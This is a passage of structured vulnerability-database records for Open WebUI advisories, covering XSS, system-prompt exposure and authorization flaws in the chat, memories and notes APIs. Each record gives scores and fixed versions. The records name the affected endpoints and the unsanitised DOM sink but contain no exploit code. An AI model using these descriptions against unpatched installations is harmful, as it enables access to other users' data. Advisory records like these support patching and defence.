url https://github.com/advisories/GHSA-3wgj-c2hg-vm6q
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases GHSA-3wgj-c2hg-vm6q
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ef1t-pxjm-j7cz
35
url VCID-gw77-ux3j-qfaa
vulnerability_id VCID-gw77-ux3j-qfaa
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.5, through the HTML rendering view, scripts can be injected and executed. The frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an iFrame with the allow-scripts allow-forms allow-same-origin sandbox directive. This means that the content is placed in a sandbox but with permission to execute scripts and access the parent’s data (e.g., local storage). As a result, only a few functions are restricted (e.g., displaying an alert box), but in effect, the sandbox attribute is largely nullified. This vulnerability is fixed in 0.6.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45303
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11107
published_at 2026-06-14T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11078
published_at 2026-06-11T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11139
published_at 2026-06-13T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11145
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45303
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45303
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45303
3
reference_url https://github.com/advisories/GHSA-4vrc-m9ch-6m3r
reference_id GHSA-4vrc-m9ch-6m3r
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4vrc-m9ch-6m3r
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r
reference_id GHSA-4vrc-m9ch-6m3r
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-19T12:24:29Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r
fixed_packages
0
url pkg:pypi/open-webui@0.6.5
purl pkg:pypi/open-webui@0.6.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k17g-bd9g-67f7
32
vulnerability VCID-k9jf-5jzd-pkge
33
vulnerability VCID-mn21-kwuu-w7by
34
vulnerability VCID-n4ma-zcpv-5fbp
35
vulnerability VCID-nxvm-97r4-6ybz
36
vulnerability VCID-pkds-1xgn-q3bv
37
vulnerability VCID-pvep-chj7-ekeg
38
vulnerability VCID-pwsg-72yy-quhk
39
vulnerability VCID-q682-k826-efhv
40
vulnerability VCID-qgfh-7u8n-y7c7
41
vulnerability VCID-qjt1-zxx8-r7ht
42
vulnerability VCID-r7vt-4bqm-f7hb
43
vulnerability VCID-reqw-pfm8-c7g5
44
vulnerability VCID-rhhj-rccv-87hw
45
vulnerability VCID-s625-eg1w-gfd1
46
vulnerability VCID-t571-d65a-cyb2
47
vulnerability VCID-tz2k-gazs-mqgd
48
vulnerability VCID-u25g-p4nx-gqd1
49
vulnerability VCID-ujye-g4rj-8be5
50
vulnerability VCID-um53-kf7u-kkg6
51
vulnerability VCID-vghe-uuzj-m7cu
52
vulnerability VCID-vkx3-71kv-sugt
53
vulnerability VCID-w2vd-r3hr-w3bt
54
vulnerability VCID-wb88-83cj-ffhy
55
vulnerability VCID-wcz4-vwx4-tufb
56
vulnerability VCID-yug9-shts-kufb
57
vulnerability VCID-yysb-dk2k-f7g4
58
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.5
aliases CVE-2026-45303, GHSA-4vrc-m9ch-6m3r
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gw77-ux3j-qfaa
36
url VCID-hj5f-yk3y-ffdg
vulnerability_id VCID-hj5f-yk3y-ffdg
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45387
reference_id
reference_type
scores
0
value 0.00026
scoring_system epss
scoring_elements 0.07958
published_at 2026-06-13T12:55:00Z
1
value 0.00026
scoring_system epss
scoring_elements 0.07953
published_at 2026-06-14T12:55:00Z
2
value 0.00026
scoring_system epss
scoring_elements 0.07928
published_at 2026-06-11T12:55:00Z
3
value 0.00026
scoring_system epss
scoring_elements 0.07963
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45387
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45387
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45387
3
reference_url https://github.com/advisories/GHSA-h2cw-7qw9-56xr
reference_id GHSA-h2cw-7qw9-56xr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h2cw-7qw9-56xr
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr
reference_id GHSA-h2cw-7qw9-56xr
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:08:24Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45387, GHSA-h2cw-7qw9-56xr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hj5f-yk3y-ffdg
37
url VCID-jfs9-dps1-27a2
vulnerability_id VCID-jfs9-dps1-27a2
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a user just needs to use the API endpoint: /api/chat/completions with their own API key (generated in OWUI) and the Chat ID of another user to continue the conversation of the other user. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45349
reference_id
reference_type
scores
0
value 0.00039
scoring_system epss
scoring_elements 0.12004
published_at 2026-06-14T12:55:00Z
1
value 0.00039
scoring_system epss
scoring_elements 0.11932
published_at 2026-06-11T12:55:00Z
2
value 0.00039
scoring_system epss
scoring_elements 0.12025
published_at 2026-06-13T12:55:00Z
3
value 0.00039
scoring_system epss
scoring_elements 0.12023
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45349
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/cf4218e688def6f11d195aeda6665ae5b5376b67
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/cf4218e688def6f11d195aeda6665ae5b5376b67
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45349
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45349
5
reference_url https://github.com/advisories/GHSA-gfm2-xm6c-37qc
reference_id GHSA-gfm2-xm6c-37qc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gfm2-xm6c-37qc
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-gfm2-xm6c-37qc
reference_id GHSA-gfm2-xm6c-37qc
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:41:10Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-gfm2-xm6c-37qc
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45349, GHSA-gfm2-xm6c-37qc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jfs9-dps1-27a2
38
url VCID-jnsg-u9dy-r3d5
vulnerability_id VCID-jnsg-u9dy-r3d5
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-64495
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01425
published_at 2026-06-14T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.0158
published_at 2026-06-13T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01576
published_at 2026-06-12T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01574
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-64495
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-64495
reference_id CVE-2025-64495
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-64495
3
reference_url https://github.com/open-webui/open-webui/commit/eb9c4c0e358c274aea35f21c2856c0a20051e5f1
reference_id eb9c4c0e358c274aea35f21c2856c0a20051e5f1
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-10T15:08:34Z/
url https://github.com/open-webui/open-webui/commit/eb9c4c0e358c274aea35f21c2856c0a20051e5f1
4
reference_url https://github.com/advisories/GHSA-w7xj-8fx7-wfch
reference_id GHSA-w7xj-8fx7-wfch
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w7xj-8fx7-wfch
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch
reference_id GHSA-w7xj-8fx7-wfch
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-10T15:08:34Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch
6
reference_url https://github.com/open-webui/open-webui/blob/7a83e7dfa367d19f762ec17cac5e4a94ea2bd97d/src/lib/components/common/RichTextInput.svelte#L348
reference_id RichTextInput.svelte#L348
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-10T15:08:34Z/
url https://github.com/open-webui/open-webui/blob/7a83e7dfa367d19f762ec17cac5e4a94ea2bd97d/src/lib/components/common/RichTextInput.svelte#L348
fixed_packages
0
url pkg:pypi/open-webui@0.6.35
purl pkg:pypi/open-webui@0.6.35
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7nbc-ng1s-suck
17
vulnerability VCID-8n6u-wgz9-1bgj
18
vulnerability VCID-8nzh-cpda-dkca
19
vulnerability VCID-8y4k-pj2n-8uhm
20
vulnerability VCID-94nj-qkdf-xfhn
21
vulnerability VCID-9jud-sr2a-8yc3
22
vulnerability VCID-chug-ma8r-cucc
23
vulnerability VCID-cw4k-3s8z-uqh8
24
vulnerability VCID-dz6g-jgmg-wqce
25
vulnerability VCID-dzh3-rqx4-fqhv
26
vulnerability VCID-ef1t-pxjm-j7cz
27
vulnerability VCID-hj5f-yk3y-ffdg
28
vulnerability VCID-jfs9-dps1-27a2
29
vulnerability VCID-k9jf-5jzd-pkge
30
vulnerability VCID-n4ma-zcpv-5fbp
31
vulnerability VCID-nxvm-97r4-6ybz
32
vulnerability VCID-pkds-1xgn-q3bv
33
vulnerability VCID-pwsg-72yy-quhk
34
vulnerability VCID-q682-k826-efhv
35
vulnerability VCID-qgfh-7u8n-y7c7
36
vulnerability VCID-qjt1-zxx8-r7ht
37
vulnerability VCID-r7vt-4bqm-f7hb
38
vulnerability VCID-reqw-pfm8-c7g5
39
vulnerability VCID-rhhj-rccv-87hw
40
vulnerability VCID-s625-eg1w-gfd1
41
vulnerability VCID-t571-d65a-cyb2
42
vulnerability VCID-u25g-p4nx-gqd1
43
vulnerability VCID-ujye-g4rj-8be5
44
vulnerability VCID-um53-kf7u-kkg6
45
vulnerability VCID-vghe-uuzj-m7cu
46
vulnerability VCID-vkx3-71kv-sugt
47
vulnerability VCID-w2vd-r3hr-w3bt
48
vulnerability VCID-wb88-83cj-ffhy
49
vulnerability VCID-wcz4-vwx4-tufb
50
vulnerability VCID-yug9-shts-kufb
51
vulnerability VCID-yysb-dk2k-f7g4
52
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.35
aliases CVE-2025-64495, GHSA-w7xj-8fx7-wfch
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jnsg-u9dy-r3d5
39
url VCID-k17g-bd9g-67f7
vulnerability_id VCID-k17g-bd9g-67f7
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, authorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories. Using a newly created non-admin user with no existing memories, it is possible to view existing memories via POST /api/v1/memories/query. Similarly, even if a non-admin user cannot modify another user's memory data via POST /api/v1/memories/{memory_id}/update, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known. The DELETE /api/v1/memories/{memory_id} can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the POST /api/v1/memories/{memory_id}/update endpoint again. This vulnerability is fixed in 0.6.19.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44570
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.1431
published_at 2026-06-14T12:55:00Z
1
value 0.00045
scoring_system epss
scoring_elements 0.14217
published_at 2026-06-11T12:55:00Z
2
value 0.00045
scoring_system epss
scoring_elements 0.14336
published_at 2026-06-13T12:55:00Z
3
value 0.00045
scoring_system epss
scoring_elements 0.14337
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44570
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44570
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44570
3
reference_url https://github.com/advisories/GHSA-hmjq-crxp-7rjw
reference_id GHSA-hmjq-crxp-7rjw
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hmjq-crxp-7rjw
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw
reference_id GHSA-hmjq-crxp-7rjw
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T12:49:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw
fixed_packages
0
url pkg:pypi/open-webui@0.6.19
purl pkg:pypi/open-webui@0.6.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k9jf-5jzd-pkge
32
vulnerability VCID-n4ma-zcpv-5fbp
33
vulnerability VCID-nxvm-97r4-6ybz
34
vulnerability VCID-pkds-1xgn-q3bv
35
vulnerability VCID-pvep-chj7-ekeg
36
vulnerability VCID-pwsg-72yy-quhk
37
vulnerability VCID-q682-k826-efhv
38
vulnerability VCID-qgfh-7u8n-y7c7
39
vulnerability VCID-qjt1-zxx8-r7ht
40
vulnerability VCID-r7vt-4bqm-f7hb
41
vulnerability VCID-reqw-pfm8-c7g5
42
vulnerability VCID-rhhj-rccv-87hw
43
vulnerability VCID-s625-eg1w-gfd1
44
vulnerability VCID-t571-d65a-cyb2
45
vulnerability VCID-u25g-p4nx-gqd1
46
vulnerability VCID-ujye-g4rj-8be5
47
vulnerability VCID-um53-kf7u-kkg6
48
vulnerability VCID-vghe-uuzj-m7cu
49
vulnerability VCID-vkx3-71kv-sugt
50
vulnerability VCID-w2vd-r3hr-w3bt
51
vulnerability VCID-wb88-83cj-ffhy
52
vulnerability VCID-wcz4-vwx4-tufb
53
vulnerability VCID-yug9-shts-kufb
54
vulnerability VCID-yysb-dk2k-f7g4
55
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.19
aliases CVE-2026-44570, GHSA-hmjq-crxp-7rjw
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k17g-bd9g-67f7
40
url VCID-k9jf-5jzd-pkge
vulnerability_id VCID-k9jf-5jzd-pkge
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, the API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. This vulnerability is fixed in 0.8.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45666
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45666
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/de3317e26bb67a2a7ea015a183bbd1d369880ebd
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/de3317e26bb67a2a7ea015a183bbd1d369880ebd
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45666
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45666
4
reference_url https://github.com/advisories/GHSA-x3qm-p8hr-3c3h
reference_id GHSA-x3qm-p8hr-3c3h
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x3qm-p8hr-3c3h
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h
reference_id GHSA-x3qm-p8hr-3c3h
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T16:14:44Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h
fixed_packages
0
url pkg:pypi/open-webui@0.8.11
purl pkg:pypi/open-webui@0.8.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
